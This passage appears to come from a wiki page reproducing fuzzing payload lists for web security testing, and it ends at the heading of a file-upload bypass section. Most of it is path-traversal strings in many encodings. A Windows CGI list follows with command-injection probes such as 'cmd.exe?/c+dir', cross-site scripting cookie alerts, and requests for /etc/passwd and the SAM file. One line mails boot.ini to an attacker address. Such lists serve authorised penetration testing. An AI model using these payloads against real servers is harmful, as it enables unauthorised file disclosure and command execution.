..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
